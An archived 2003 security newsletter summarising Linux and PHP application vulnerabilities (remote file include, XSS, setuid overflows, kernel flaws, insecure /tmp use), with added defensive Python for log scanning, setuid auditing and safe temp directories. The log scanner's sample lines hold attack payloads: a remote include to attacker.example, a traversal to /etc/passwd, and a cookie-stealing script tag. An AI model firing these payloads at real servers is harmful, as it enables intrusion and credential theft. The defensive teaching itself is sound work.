
SecurityFocus Linux Newsletter #142

From: John Boletta <jboletta(at)securityfocus.com>
Date: Mon Jul 28 2003 - 16:49:07 EDT

This Issue is Sponsored by: SPI Dynamics

ALERT:
"How a Hacker Launches a LDAP Injection Attack Step-by-Step" - White Paper
It's as simple as placing additional LDAP query commands into a Web form input box giving hackers complete access to all your backend systems! Firewalls and IDS will not stop such attacks because LDAP Injections are seen as valid data.

Download this *FREE* white paper from SPI Dynamics for a complete guide to protection!
http://www.securityfocus.com/SPIDynamics-linux-secnews7


I. FRONT AND CENTER

  1. "Copying is Theft ..."
  2. Demonstrating ROI for Penetration Testing (Part One)
  3. Detecting SQL Injection in Oracle

II. LINUX VULNERABILITY SUMMARY

  1. SimpNews PATH_SIMPNEWS Remote File Include Vulnerability
  2. Drupal Cross-Site Scripting Vulnerability
  3. Top Home Environment Variable Local Buffer Overflow Vulnerability
  4. MoreGroupWare WEBMAIL2_INC_DIR Remote File Include Vulnerability
  5. WebCalendar Local File Include Information Disclosure...
  6. GnuPG Group Root File Corruption Vulnerability
  7. GNU GNATS Queue-PR Database Command Line Option Buffer Overflow...
  8. Multiple Linux 2.4 Kernel Vulnerabilities
  9. FDClone Local Insecure Temporary Directory Creation Vulnerability

III. LINUX FOCUS LIST SUMMARY

  1. NO NEW POSTS FOR THE WEEK ENDING 07.25.03

IV. NEW PRODUCTS FOR LINUX PLATFORMS

  1. ipANGEL
  2. NetMAX VPN Server Suite
  3. PENS

V. NEW TOOLS FOR LINUX PLATFORMS

  1. Rate v0.81
  2. CalcChecksum v1.4
  3. OpenVPN v1.4.2

VI. SPONSOR INFORMATION


I. FRONT AND CENTER

1. "Copying is Theft ..." By Mark Rasch

And other legal myths in the looming battle over peer-to-peer.

http://www.securityfocus.com/columnists/175

2. Demonstrating ROI for Penetration Testing (Part One) By Marcia Wilson


This is the first in a series of articles demonstrating ROI (return on investment) for a penetration test. You will have to step into the world of budgeting, cost justification, resource allocation, and learn a few unfamiliar terms.

http://www.securityfocus.com/infocus/1715

3. Detecting SQL Injection in Oracle
By Pete Finnigan

This paper takes the subject of SQL injection further and investigates the possibilities for the Oracle Database Administrator to detect SQL injection in the wild.

http://www.securityfocus.com/infocus/1714

II. BUGTRAQ SUMMARY


1. SimpNews PATH_SIMPNEWS Remote File Include Vulnerability
BugTraq ID: 8227
Remote: Yes
Date Published: Jul 18 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8227
Summary:

SimpNews is a web news system implemented in PHP. It is available for Unix/Linux variants and Microsoft Windows operating systems.

SimpNews is prone to a vulnerability that may permit remote attackers to include and execute malicious PHP scripts. Remote users, under some PHP configurations (in practice those with register_globals enabled, which lets a request parameter initialize an otherwise unset script variable), may set the $path_simpnews variable from the request URI. This variable is used in the include path for the 'config.php', 'functions.php' and 'includes/has_entries.inc' scripts. By pointing the include path at a malicious PHP script on a remote system, which additionally requires that the server's PHP permits URL includes (allow_url_fopen, in PHP of this era), it is possible to cause arbitrary PHP code to be executed. This would occur in the context of the web server. This issue exists in both the 'eventcal2.php' and 'eventscroller.php' scripts.

This could be exploited to execute malicious PHP commands in the context of the web server process.

It should be noted that although SimpNews versions 2.01 through 2.13 have been reported vulnerable, other versions might also be affected.

2. Drupal Cross-Site Scripting Vulnerability
BugTraq ID: 8235
Remote: Yes
Date Published: Jul 21 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8235
Summary:

Drupal is an open-source content management system. Drupal is available for a number of platforms including Microsoft Windows operating systems and Unix/Linux variants.

The Drupal content management system is prone to a cross-site scripting vulnerability. This issue is exposed through the main page and through other sub-pages. An attacker may exploit this issue by including hostile HTML and script code in a malicious link to Drupal. This code may be rendered in the web browser of a user who visits the link. This would occur in the security context of the site hosting Drupal.

The attacker-supplied HTML and script code would be able to access properties of the site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user.

3. Top Home Environment Variable Local Buffer Overflow Vulnerability
BugTraq ID: 8239
Remote: No
Date Published: Jul 22 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8239
Summary:

top is a freely available, open source process monitoring utility. It is available for various Unix and Linux platforms.


A buffer overflow condition has been reported in top when handling environment variables of excessive length. This may result in an attacker potentially executing arbitrary code.

The problem is in the checking of bounds on the HOME environment variable. top does not properly handle input of excessive length in the HOME environment variable. By placing a string of excessive length (1100 bytes) in this environment variable, an attacker may be able to corrupt sensitive process memory, and potentially execute arbitrary code with the privileges of the top program.

It should be noted that top is typically installed with the setuid root bit set.

Additionally, although top versions less than or equal to version 2.0.11 have been reported vulnerable, it should be noted that other versions might also be vulnerable.

4. MoreGroupWare WEBMAIL2_INC_DIR Remote File Include Vulnerability
BugTraq ID: 8249
Remote: Yes
Date Published: Jul 23 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8249
Summary:

moregroupware is a tool to facilitate office communications. It includes, among other features, webmail, calendaring and project management functionality. It is implemented in PHP and is available for a variety of platforms including Microsoft Windows and Linux and Unix variant operating environments.

moregroupware is prone to a vulnerability that may permit remote attackers to include and execute malicious PHP scripts. Remote users, under some PHP configurations (those with register_globals enabled), may set the $webmail2_inc_dir variable, or in some cases the $appconf variable, from the request URI. These variables are used in the include path for the 'mimepart.php', 'pear.php' and 'mime_types.php' scripts. By influencing the include path so that it points to a malicious PHP script on a remote system, it is possible to cause arbitrary PHP code to be executed. This would occur in the context of the web server. This issue exists in the 'class.html.mime.mail.inc', 'rfc822.php' and 'webmail2_func.inc' scripts.

This could be exploited to execute malicious PHP commands in the context of the web server process.


It should be noted that although moregroupware version 0.6.8 has been reported vulnerable, other versions might also be affected.

5. WebCalendar Local File Include Information Disclosure Vulnerability
BugTraq ID: 8237
Remote: Yes
Date Published: Jul 21 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8237
Summary:

WebCalendar is a freely available, open source web calendar software package. It is available for the Unix and Linux operating systems.

It has been reported that an information disclosure issue exists in WebCalendar. This may allow an attacker to gain unauthorized read access to potentially sensitive information with the privileges of the web server process.

The problem is in the handling of directory traversal sequences passed in the user_inc variable. When a request for any PHP script is made with a directory traversal string in user_inc, the file at the end of that path is included and its contents are disclosed, readable with the privileges of the web server process.
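
The four web-application items above (the SimpNews and moregroupware remote includes, the WebCalendar traversal through user_inc, and the Drupal cross-site scripting) all leave a signature in the web server's access log. The following script, added here as an example and not taken from the newsletter or from any of those projects, classifies the query parameters of Apache-style log lines: a remote URL in one of the named include-path parameters, a ../ component (including double-encoded and NUL-terminated forms), or script markup in any parameter. The parameter list INCLUDE_PARAMS, the host names and the sample log lines are constructed for the example.

```python
"""Flag remote-file-include, directory-traversal and reflected-XSS attempts in
Apache-style access logs.

Added example for this newsletter; not code from SimpNews, moregroupware,
WebCalendar or Drupal. SAMPLE_LOG is constructed and INCLUDE_PARAMS is an
assumed list seeded from the parameter names the advisories mention."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Common Log Format prefix: client, ident, user, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Parameters used as include paths by the affected applications (assumed list; extend per deployment).
INCLUDE_PARAMS = {"path_simpnews", "webmail2_inc_dir", "appconf", "user_inc"}

REMOTE_SCHEME = re.compile(r'^(https?|ftp)://', re.I)      # remote file include
TRAVERSAL = re.compile(r'(^|[\\/])\.\.([\\/]|$)')           # a ".." path component
XSS = re.compile(r'<\s*/?\s*(script|img|iframe|svg)\b|javascript:|\bon\w+\s*=', re.I)


def classify_request(target):
    """Return tags such as 'rfi:<param>' for every suspicious query parameter in a request target."""
    findings = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        # parse_qsl percent-decodes once; decode again so %252e%252e (double-encoded "..") is caught.
        value = unquote(value)
        if name in INCLUDE_PARAMS and REMOTE_SCHEME.match(value):
            findings.append("rfi:" + name)
        if TRAVERSAL.search(value):
            findings.append("traversal:" + name)
        if "\x00" in value:
            # NUL truncation was the classic way to drop a suffix the script appends to the path.
            findings.append("nullbyte:" + name)
        if XSS.search(value):
            findings.append("xss:" + name)
    return findings


def scan_log(lines):
    """Return (client, target, tags) for each parseable line that has at least one finding."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify_request(m.group("target"))
        if tags:
            hits.append((m.group("ip"), m.group("target"), tags))
    return hits


# Constructed sample log; hosts and paths are made up for the example.
SAMPLE_LOG = [
    '10.0.0.5 - - [21/Jul/2003:10:15:02 -0400] "GET /simpnews/eventcal2.php?path_simpnews=http://attacker.example/x HTTP/1.0" 200 512',
    '10.0.0.6 - - [21/Jul/2003:10:16:11 -0400] "GET /webcalendar/day.php?user_inc=../../../../etc/passwd%00 HTTP/1.1" 200 1403',
    '10.0.0.7 - - [21/Jul/2003:10:17:30 -0400] "GET /drupal/?q=node/1&title=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 8192',
    '10.0.0.8 - - [21/Jul/2003:10:18:00 -0400] "GET /mgw/webmail2/inc/mimepart.php?webmail2_inc_dir=ftp://attacker.example/ HTTP/1.1" 200 10',
    '10.0.0.9 - - [21/Jul/2003:10:19:00 -0400] "GET /drupal/?q=node/2 HTTP/1.1" 200 7000',
]

if __name__ == "__main__":
    for ip, target, tags in scan_log(SAMPLE_LOG):
        print(ip, ",".join(tags), target)
```

Because register_globals turned every request parameter into a candidate variable, the include check is keyed on the parameter names the advisories mention; in a real deployment extend INCLUDE_PARAMS from the application's include statements rather than flagging every URL-valued parameter, which would bury the report under redirect and referrer fields.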

6. GnuPG Group Root File Corruption Vulnerability
BugTraq ID: 8228
Remote: No
Date Published: Jul 19 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8228
Summary:

gnupg is an encryption utility that is available for a number of platforms, including Unix/Linux variants.

gnupg is reported to be prone to an issue that could permit a malicious local user to corrupt files owned by the root group. This issue is reportedly the result of the gnupg binary being installed set-group-ID with group root, so that files it writes are created or modified with root group privileges. The issue was reported for Gentoo Linux, though other distributions may have a similar default installation and be prone to this issue.

This vulnerability may potentially be exploited to corrupt critical or sensitive files for a denial of service. The possibility of privilege escalation also exists.

7. GNU GNATS Queue-PR Database Command Line Option Buffer Overflow Vulnerability
BugTraq ID: 8232
Remote: No
Date Published: Jul 21 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8232
Summary:

GNU GNATS is a freely available bug tracking system. It is available for a variety of Linux and Unix variant operating environments.

The queue-pr utility ships with GNATS and is used to manage the GNATS queue. It is typically installed set-uid to the 'gnats' user.

A stack overflow vulnerability has been reported in the queue-pr utility. The vulnerability occurs due to insufficient bounds checks performed on the database name passed to the '-d' command line option.

An attacker may trigger the vulnerability by invoking queue-pr with a database name of 1148 bytes or more.

Successful exploitation may result in the execution of attacker-supplied code with potentially elevated privileges.

It should be noted that on some systems, the queue-pr utility might be installed with setuid 'root' privileges.


It should be noted that although this vulnerability has been reported to affect GNATS version 3.113.1_6, other versions might be affected.
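
What top, the GnuPG binary on Gentoo and GNATS queue-pr have in common is that each bug only matters because the program carries a set-uid or set-gid bit. The script below, an added example rather than code from any of those projects or from the newsletter, walks a set of directories and reports every set-id executable with the user or group it runs as, so the binaries named in this issue (and anything else unexpected) can be found and, where the bit is not needed, cleared. The demo() function builds a constructed scratch tree so the audit can be exercised without touching system paths.

```python
"""Enumerate set-user-ID and set-group-ID executables and report who they run as.

Added example prompted by the top, GnuPG and GNATS queue-pr items; it is not
code from those projects. demo() builds a constructed directory tree."""
import grp
import os
import pwd
import stat
import tempfile


def classify_mode(mode, uid, gid):
    """Tag a regular file's mode: 'suid-root'/'suid' and/or 'sgid-root'/'sgid'; [] otherwise."""
    tags = []
    if not stat.S_ISREG(mode):
        return tags                      # set-gid on a directory means group inheritance, not privilege
    if mode & stat.S_ISUID:
        tags.append("suid-root" if uid == 0 else "suid")
    if mode & stat.S_ISGID:
        tags.append("sgid-root" if gid == 0 else "sgid")
    return tags


def _name(lookup, key):
    """Resolve a uid/gid to a name, falling back to the number when the entry is missing."""
    try:
        return lookup(key)[0]
    except KeyError:
        return str(key)


def audit(roots):
    """Walk roots and return (path, octal mode, owner, group, tags) for every set-id executable."""
    findings = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for fname in files:
                path = os.path.join(dirpath, fname)
                try:
                    st = os.lstat(path)  # lstat: do not follow symlinks into other trees
                except OSError:
                    continue
                tags = classify_mode(st.st_mode, st.st_uid, st.st_gid)
                if tags:
                    findings.append((path, oct(stat.S_IMODE(st.st_mode)),
                                     _name(pwd.getpwuid, st.st_uid),
                                     _name(grp.getgrgid, st.st_gid), tags))
    return findings


def demo():
    """Constructed tree: one set-uid script and one plain one. Returns what audit() flagged."""
    base = tempfile.mkdtemp(prefix="setid-audit-demo-")
    suid_path = os.path.join(base, "top-like")
    plain_path = os.path.join(base, "plain")
    for p in (suid_path, plain_path):
        with open(p, "w") as f:
            f.write("#!/bin/sh\nexit 0\n")
    os.chmod(plain_path, 0o755)
    os.chmod(suid_path, 0o4755)          # some filesystems silently drop the bit; reported below
    flagged = {entry[0] for entry in audit([base])}
    return {
        "suid_bit_set": bool(os.stat(suid_path).st_mode & stat.S_ISUID),
        "suid_flagged": suid_path in flagged,
        "plain_flagged": plain_path in flagged,
    }


if __name__ == "__main__":
    # Real use: audit(["/bin", "/usr/bin", "/usr/sbin", "/usr/local"]) and review every *-root entry.
    for entry in audit(["/usr/bin"]):
        print(*entry)
```

Review every suid-root and sgid-root entry against what the package manager says should carry the bit; for a program such as top, where the set-uid bit is a convenience rather than a requirement, removing it with chmod u-s is a reasonable interim mitigation until a fixed package is installed.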

8. Multiple Linux 2.4 Kernel Vulnerabilities
BugTraq ID: 8233
Remote: Yes
Date Published: Jul 21 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8233
Summary:

Red Hat has released an advisory reporting the existence of multiple vulnerabilities in the Linux 2.4 kernel. The following issues were reported:

/proc/tty/driver/serial may expose sensitive information to local attackers by revealing the exact character count for serial links. This information could permit a malicious local user to infer password lengths and the timing between keystrokes when entering passwords. This might aid in brute-force attacks that attempt to compromise another user's password.

A race condition in the implementation of the execve() system call was reported. This issue is described in BID 8042.

The kernel RPC code was reported to have recently changed, causing the reuse flag on newly created sockets to be set. This introduced a vulnerability that could permit unprivileged users to bind to UDP ports used by related services, such as nfsd.

A vulnerability in the implementation of the execve() system call could permit malicious local users to gain read access to restricted file descriptors. This occurs because the file descriptor of the executable being run is stored in the file table of the calling process. This could be exploited to gain access to sensitive information. This is related to the race condition in execve() and is also discussed in BID 8042.

A flaw in the /proc filesystem could be exploited to gain access to sensitive information. If /proc/self entries are opened before a setuid program is executed, the kernel may fail to change the ownership and permissions of those already-open entries, leaving them readable by the unprivileged process that opened them.

Red Hat has disabled Spanning Tree Protocol (STP) support in its kernels because the implementation lacks security safeguards; other distributions may still ship it enabled. A separate issue in the kernel's STP code, caused by insufficient length checking, may permit denial of service attacks.

It was reported that the kernel bridge forwarding table may be spoofed by forged packets whose source address is the same as the host's.

These issues will be divided into separate BIDs when further analysis is complete.

9. FDClone Local Insecure Temporary Directory Creation Vulnerability
BugTraq ID: 8247
Remote: No
Date Published: Jul 23 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8247
Summary:

fdclone is a freely available, open source file management tool. It is available for the Linux platform.

A problem has been reported in the creation of temporary directories by fdclone. Because of this, an attacker may be able to gain access to potentially sensitive information.

The problem is in the creation of directories by the fdclone program under /tmp. fdclone does not check whether its temporary directory already exists before using it, and does not validate the ownership or permissions of an existing directory. A local attacker who creates the directory first may therefore be able to read the contents of temporary files created by fdclone. It may also be possible to launch symbolic link attacks with this vulnerability.
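
The fdclone issue is the classic /tmp pattern: the program assumes that a directory of a fixed name under /tmp is its own, so another user can create it first (world-writable, or as a symbolic link) and read or redirect whatever fdclone writes there. The code below, an added example rather than fdclone's own, shows both the check a fixed-name directory needs before it is reused (not a symlink, a real directory, owned by the caller, no group or other bits) and the better alternative of an unpredictable name created with mode 0700. Path names and the demo() scenario are constructed.

```python
"""Create or reuse a private temporary directory without trusting a pre-existing /tmp entry.

Added example; not fdclone's code. Directory names and the demo() scenario are constructed."""
import os
import stat
import tempfile


class UnsafeTempDir(Exception):
    """Raised when an existing path must not be reused as our private temp directory."""


def check_private_dir(path, uid=None):
    """Accept `path` only if it is a real directory (not a symlink), owned by uid, and 0700 or tighter."""
    uid = os.geteuid() if uid is None else uid
    st = os.lstat(path)                        # lstat: a planted symlink is exactly the attack
    if stat.S_ISLNK(st.st_mode):
        raise UnsafeTempDir("%s is a symbolic link" % path)
    if not stat.S_ISDIR(st.st_mode):
        raise UnsafeTempDir("%s is not a directory" % path)
    if st.st_uid != uid:
        raise UnsafeTempDir("%s is owned by uid %d, not %d" % (path, st.st_uid, uid))
    if st.st_mode & (stat.S_IRWXG | stat.S_IRWXO):
        raise UnsafeTempDir("%s is accessible to group or others (%s)"
                            % (path, oct(stat.S_IMODE(st.st_mode))))
    return True


def open_private_tmpdir(path):
    """Fixed-name variant: mkdir(path, 0700) atomically; on EEXIST reuse only after check_private_dir()."""
    try:
        os.mkdir(path, 0o700)                  # umask can only remove bits, never add group/other access
        return path
    except FileExistsError:
        check_private_dir(path)                # someone got there first: verify before trusting it
        return path


def fresh_private_tmpdir():
    """Preferred variant: unpredictable name, created 0700, so there is nothing to pre-create."""
    return tempfile.mkdtemp(prefix="fdclone-example-")


def _rejected(path):
    """True if open_private_tmpdir refuses `path`."""
    try:
        open_private_tmpdir(path)
    except UnsafeTempDir:
        return True
    return False


def demo():
    """Constructed scenario under a scratch directory; returns which cases were accepted or rejected."""
    base = tempfile.mkdtemp(prefix="tmpdir-demo-")
    good = os.path.join(base, "fd-good")
    results = {"fresh": open_private_tmpdir(good) == good,
               "reuse_own_0700": open_private_tmpdir(good) == good}
    os.chmod(good, 0o777)                      # now world-writable: must be refused
    results["world_writable"] = _rejected(good)
    link = os.path.join(base, "fd-link")
    os.symlink(base, link)                     # attacker-planted symlink at the expected name
    results["symlink"] = _rejected(link)
    mode = stat.S_IMODE(os.stat(fresh_private_tmpdir()).st_mode)
    results["random_name_private"] = mode & (stat.S_IRWXG | stat.S_IRWXO) == 0
    return results
```

The mkdir call is the important line: because mkdir fails with EEXIST rather than silently adopting whatever is already there, the program never inherits an attacker's directory without noticing, and the ownership and mode checks catch the cases where noticing is not enough.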

III. LINUX FOCUS LIST SUMMARY


1. NO NEW POSTS FOR THE WEEK ENDING 07.25.03

IV. NEW PRODUCTS FOR LINUX PLATFORMS


1. ipANGEL
by Lucid Security
Platforms: Os Independent
Relevant URL:
http://www.lucidsecurity.com/products.php
Summary:

Lucid Security's ipANGEL, coupled with Check Point FireWall-1, provides complete protection against all network and application attacks. ipANGEL marks a departure from the traditional thinking of what an intrusion prevention product should do. It detects and shields vulnerable applications without duplicating the capabilities of the firewall. Lucid Security purposefully limited ipANGEL's scope:
- Operates exclusively with FireWall-1
- Does not duplicate FireWall-1's capabilities
- Ignores traffic that is not an attack against vulnerable applications and systems
This approach has enabled Lucid Security to focus on building the intelligence and automation that make ipANGEL easy to deploy and maintain. Together, ipANGEL and FireWall-1 actively defend against attacks in real time.

2. NetMAX VPN Server Suite
by Cybernet Systems
Platforms: Linux, Windows 2000, Windows 95/98, Windows NT
Relevant URL:
http://www.netmax.com/products/vpn_prods.html
Summary:

The NetMAX VPN Server Suite simplifies Linux servers by installing a ready-to-configure network security solution consisting of a Virtual Private Network (VPN) server, firewall, router, and proxy/cache server, along with the Linux operating system. NetMAX Internet Appliance Software provides small/medium sized businesses and enterprise workgroups easy use of a browser-based administration and pre-configured suite of applications, along with the strength and reliability of Linux.

3. PENS
by Portcullis Computer Security
Platforms: Linux, Netware, Windows 2000, Windows 95/98, Windows NT
Relevant URL:
http://www.securitynet.kirion.net/encryption-software/
Summary:

PENS is an on-the-fly encryption software system with either 56-bit DES or, new for Version 1.5, 128-bit IDEA and Triple DES algorithms for data encryption and 1024-bit RSA for key exchange and authentication. Users are given their own encrypted domains with which they can protect their files. They can also let other users enter these domains - should the administrator allow that - making worksharing easier. All they have to do is send their keys to the person who requires them.

V. NEW TOOLS FOR LINUX PLATFORMS


1. Rate v0.81
by mteg
Relevant URL:
http://s-tech.elsat.net.pl/
Platforms: FreeBSD, Linux, OpenBSD, Solaris, SunOS
Summary:

Rate is a Swiss-Army-knife bandwidth measurement tool. Its primary application is calculating the bandwidth used by packets matching a given BPF packet filter expression, which can really help a network administrator see what is happening at a software-based router at the moment. Administrators can measure the traffic generated by a single host or by a whole subnet, and measure HTTP traffic, broadcast traffic, quake traffic, etc. It can also be used for generating per-IP statistics and for determining nodes that generate highest traffic; it has a special operation mode for it. Additionally, it is able to extract strings from packets based on a POSIX regular expression.

2. CalcChecksum v1.4
by Michael Buesch
Relevant URL:
http://www.8ung.at/tuxsoft/
Platforms: POSIX
Summary:


CalcChecksum is a simple utility for calculating various checksums easily with a graphical user interface.

3. OpenVPN v1.4.2
by James Yonan
Relevant URL:
http://openvpn.sourceforge.net/
Platforms: Linux, POSIX
Summary:

OpenVPN is a robust and highly configurable VPN (Virtual Private Network) daemon which can be used to securely link two or more private networks using an encrypted tunnel over the Internet. You can tunnel any IP subnetwork or virtual ethernet adapter over a single UDP port, use all of the encryption, authentication, and certification features of the OpenSSL library to protect your private network traffic, use any cipher, key size, or HMAC digest (for packet authentication) supported by the OpenSSL library, choose between static-key based conventional encryption or certificate-based public key encryption, use static or TLS-based dynamic key exchange, and tunnel networks whose public endpoints are dynamic such as DHCP clients or dial-in users.

VI. SPONSOR INFORMATION


Received on Mon Jul 28 17:30:59 2003

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:02:27 EDT

